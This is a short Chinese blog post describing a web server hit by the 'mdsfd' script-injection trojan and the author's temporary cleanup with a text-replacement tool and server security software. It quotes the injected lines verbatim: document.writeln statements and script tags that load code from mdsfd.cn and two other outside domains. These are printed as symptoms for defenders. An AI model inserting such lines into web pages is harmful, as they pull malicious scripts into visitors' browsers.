WL

越来越好,越好越来

Tag: 木马


  • mdsfd木马临时解决方案

    服务器1月份就中马了,项目太紧,人太懒,又无关紧要,就一直没搭理它。小昭的BLOG纠结中,龚浩的BLOG纠结中……唉,没办法,小昭可乐都给我买了,不得不出山了。服务器上网站太多,不知是哪有漏洞,索性弄了一招治标不治本的,暂时顶着先。 症状: 网页被挂马,多了一句<script src=http://mdsfd.cn></script>,挂的恶意网站有如下等等:www.51jcjy.com www.rr88rr.cn,所有的JS文件均被添加了 document.writeln (“<script src=\”http://mdsfd.cn\”><\/script>”); document.writeln (“<script src=\”http://vawh5.cn\”><\/script>”); document.writeln (“<script src=\”http://lnadk.cn\”><\/script>”); 个别ASP文件被添加上了 <script src=http://mdsfd.cn></script> 删除之后过一段时间文件又被修改。排除ARP病毒,IIS配置文件被改的可能性,具体步骤不做讲解。查找木马的根源,无奈服务器上网站太多,没法子下手。遂先解决当前问题…… 现在采用了以下方案: 首先下载 文本替换专家 2.6,将恶意代码全部清除。 登录www.websafeguard.cn 下载 网站安全卫士-服务器版 配置一下就OK了。详细的设置查帮助文档。 后话 还有一哥们提供了方案,买他们的mdcsoft-ips软件,貌似可以从根源上防止问题。只不过这网站的名字 Mdcsoft(中国)研究院,Mdcsoft(中国)研发集团,够山寨